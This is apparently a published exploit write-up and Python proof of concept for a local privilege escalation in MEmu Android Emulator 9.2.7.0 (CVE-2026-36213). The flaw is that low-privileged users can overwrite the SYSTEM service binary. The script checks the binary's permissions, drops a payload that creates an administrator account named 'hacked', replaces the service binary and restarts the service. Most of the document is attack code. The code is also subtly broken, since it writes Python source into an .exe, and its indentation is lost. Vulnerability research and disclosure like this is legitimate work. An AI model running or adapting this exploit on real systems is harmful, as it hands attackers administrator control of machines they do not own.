# Exploit Title: MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation
# Google Dork: N/A
# Date: 2026-06-16
# Exploit Author: Mohammad
# Vendor Homepage: https://www.memuplay.com
# Software Link: https://www.memuplay.com/download.html
# Version: 9.2.7.0
# Tested on: Windows 10 x64 / Windows 11 x64
# CVE: CVE-2026-36213
###############################################
# Vulnerability Description
###############################################
#
# MEmu Android Emulator 9.2.7.0 installs a Windows
# service named "MEmuSVC" that runs with
# NT AUTHORITY\SYSTEM (LocalSystem) privileges.
#
# The service binary located at:
# C:\Program Files\Microvirt\MEmu\MemuService.exe
#
# is installed with insecure NTFS permissions,
# granting FullControl (F) to low-privileged groups:
# - BUILTIN\Users
# - Everyone
#
# A low-privileged local user can replace the service
# binary with a malicious executable.
# Upon service restart, the malicious binary executes
# with NT AUTHORITY\SYSTEM privileges.
#
# Vulnerability Type : Incorrect Access Control
# CWE : CWE-732 (Incorrect Permission
# Assignment for Critical Resource)
# CVSS v3.1 Score : 7.8 HIGH
# CVSS Vector : AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
#
###############################################
# Verification - Check Permissions
###############################################
#
# Run the following command to verify vulnerability:
#
# icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
#
# Vulnerable output:
# C:\Program Files\Microvirt\MEmu\MemuService.exe
# BUILTIN\Users:(F)
# Everyone:(F)
# NT AUTHORITY\SYSTEM:(F)
# BUILTIN\Administrators:(F)
#
###############################################
# Proof of Concept
###############################################
import os
import sys
import shutil
import subprocess
import ctypes
# -----------------------------------------------
# Step 1: Check if running as low-privileged user
# -----------------------------------------------
def is_admin():
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
# -----------------------------------------------
# Step 2: Verify vulnerable permissions on binary
# -----------------------------------------------
def check_permissions(target_path):
print("[*] Checking permissions on service binary...")
print(f"[*] Target: {target_path}\n")
result = subprocess.run(
["icacls", target_path],
capture_output=True,
text=True
)
output = result.stdout
print(output)
# Check for vulnerable permissions
vulnerable = False
dangerous_groups = ["BUILTIN\\Users", "Everyone"]
for group in dangerous_groups:
if group in output and "(F)" in output:
print(f"[!] VULNERABLE: {group} has FullControl (F)")
vulnerable = True
return vulnerable
# -----------------------------------------------
# Step 3: Create malicious payload
# (در محیط واقعی اینجا payload قرار میگیره)
# -----------------------------------------------
def create_payload(payload_path):
print("\n[*] Creating malicious payload...")
# این یه نمونه سادهست
# در محیط واقعی اینجا کد مخرب قرار میگیره
# مثلاً reverse shell یا user creation
payload_code = '''
import os
# Example: Add new admin user
os.system("net user hacked Password123! /add")
os.system("net localgroup administrators hacked /add")
print("[+] Payload executed as NT AUTHORITY\\SYSTEM")
'''
# کامپایل یا آمادهسازی payload
with open(payload_path, "w") as f:
f.write(payload_code)
print(f"[+] Payload created at: {payload_path}")
# -----------------------------------------------
# Step 4: Replace legitimate binary with payload
# -----------------------------------------------
def replace_binary(target_path, payload_path):
print("\n[*] Replacing service binary...")
# Backup original binary
backup_path = target_path + ".bak"
try:
shutil.copy2(target_path, backup_path)
print(f"[+] Original backed up to: {backup_path}")
shutil.copy2(payload_path, target_path)
print(f"[+] Binary replaced successfully!")
return True
except PermissionError:
print("[-] Permission denied - Not vulnerable")
return False
except Exception as e:
print(f"[-] Error: {e}")
return False
# -----------------------------------------------
# Step 5: Restart service to trigger execution
# -----------------------------------------------
def restart_service(service_name):
print(f"\n[*] Restarting service: {service_name}")
try:
subprocess.run(
["sc", "stop", service_name],
capture_output=True
)
print(f"[+] Service stopped")
import time
time.sleep(2)
subprocess.run(
["sc", "start", service_name],
capture_output=True
)
print(f"[+] Service started")
print(f"[+] Payload should now execute as SYSTEM!")
return True
except Exception as e:
print(f"[-] Error restarting service: {e}")
return False
# -----------------------------------------------
# Main Exploit Flow
# -----------------------------------------------
def main():
print("=" * 55)
print(" CVE-2026-36213 - MEmu LPE PoC")
print(" MEmu Android Emulator 9.2.7.0")
print(" Researcher: Mohammad")
print("=" * 55)
# Config
TARGET_SERVICE = "MEmuSVC"
TARGET_BINARY = (
r"C:\Program Files\Microvirt\MEmu\MemuService.exe"
)
PAYLOAD_PATH = r"C:\Temp\payload.exe"
# Check not running as admin
if is_admin():
print("[!] Run this as a LOW-PRIVILEGED user!")
print("[!] This PoC demonstrates LPE")
sys.exit(1)
print(f"[*] Running as: {os.getenv('USERNAME')}")
print(f"[*] Admin : {is_admin()} (should be False)\n")
# Step 1: Verify vulnerability
if not check_permissions(TARGET_BINARY):
print("\n[-] Target does not appear vulnerable")
print("[-] Permissions may have been fixed")
sys.exit(0)
print("\n[+] Target is VULNERABLE!")
# Step 2: Create payload
create_payload(PAYLOAD_PATH)
# Step 3: Replace binary
if not replace_binary(TARGET_BINARY, PAYLOAD_PATH):
print("\n[-] Exploit failed at binary replacement")
sys.exit(1)
# Step 4: Trigger execution
restart_service(TARGET_SERVICE)
print("\n[+] Exploit completed!")
print("[+] Check if payload executed successfully")
print("=" * 55)
if __name__ == "__main__":
main()
###############################################
# Detection Script
###############################################
#
# Automated detection tool available at:
# https://github.com/sec-zone/Hijack-service-binaries
#
###############################################
# Disclosure Timeline
###############################################
#
# 2026-02-20 → Vulnerability discovered
# 2026-02-20 → CVE-2026-36213 assigned by MITRE
# 2026-06-11 → Vendor (Microvirt) notified
# 2026-06-16 → Public disclosure
#
###############################################
# References
###############################################
#
# [1] CWE-732: Incorrect Permission Assignment
# https://cwe.mitre.org/data/definitions/732.html
#
# [2] CVE-2026-36213
# https://www.cve.org/CVERecord?id=CVE-2026-36213
#
# [3] Detection Script
# https://github.com/sec-zone/Hijack-service-binaries
#
###############################################